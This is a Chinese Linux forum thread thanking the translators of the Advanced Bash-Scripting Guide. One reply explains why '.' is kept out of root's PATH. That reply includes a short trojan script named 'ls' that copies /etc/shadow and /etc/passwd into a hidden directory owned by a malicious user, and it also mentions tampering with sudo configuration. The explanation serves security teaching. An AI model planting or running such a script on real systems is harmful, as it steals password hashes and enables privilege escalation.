LinuxSir.cn,穿越时空的Linuxsir!

热搜: shell linux mysql
楼主: kiron

高级Bash脚本编程指南(Advanced Bash-Scripting Guide):[最新]中文正式3.9.1版发布

惊人的毅力啊,多谢你们的辛勤劳动。

"因为由于安全的因素[译者注:如果你感兴趣的话,其中一个安全漏洞可在LinuxSir的Shell版中我发的一篇帖子里找到]当前目录默认不加入到用户的$PATH.变量中。"
我想查看该帖,能否给出一个确切地址,我搜索不到
-__-
谢谢!

谢谢你们

谢谢你们了.真的是功德无量

不错,支持一下。

不错,支持一下。

kiron的精神让我们感动!

Post by dddddrrrr;1784755
"因为由于安全的因素[译者注:如果你感兴趣的话,其中一个安全漏洞可在LinuxSir的Shell版中我发的一篇帖子里找到]当前目录默认不加入到用户的$PATH.变量中。"
我想查看该帖,能否给出一个确切地址,我搜索不到
-__-
谢谢!

链接我也找不到了。。。在这儿简单说一下吧。
这个漏洞其实很老也很简单,如果是root把当前目录.加到PATH环境变量的开头,
像这样:PATH=.PATH,因为SHELL寻找命令所在的目录时,按PATH变量值中以:分割的各个目录中依次寻找命令。上面这样设置时会使当前目录的优先级最高。
现在有一个恶意用户a,家目录是/home/a,在他的家目录下写了一个脚本,类似像下面的:

1. #!/bin/bash
  2. mkdir /home/a/.hidden >/dev/null 2>&1
  3. cp /etc/shadow /etc/passwd /home/a/.hidden >/dev/null 2>&1
  4. chown -R a.a /home/a/.hidden >/dev/null 2>&1
  5. /bin/ls
复制代码

命名为ls
这样,当ROOT某天在进入a用户的家目录做常规检查时,习惯性的输入ls时,执行的是恶意用户a的脚本,不是/bin/ls,a用户就这样窃取了密码文件。
当然恶意用户目的不一定是窃取密码文件,也可能是做在sudo的配置文件中加入自己为超级用户之类的坏事。

辛苦了, 一定要顶一下, 刚进这个论坛,就发现这样的好东东

这么好的东西,不顶真的是对不起编者,谢谢分享,太谢谢了!

二位,真是太强了。对我们初学者是一个莫大的帮助。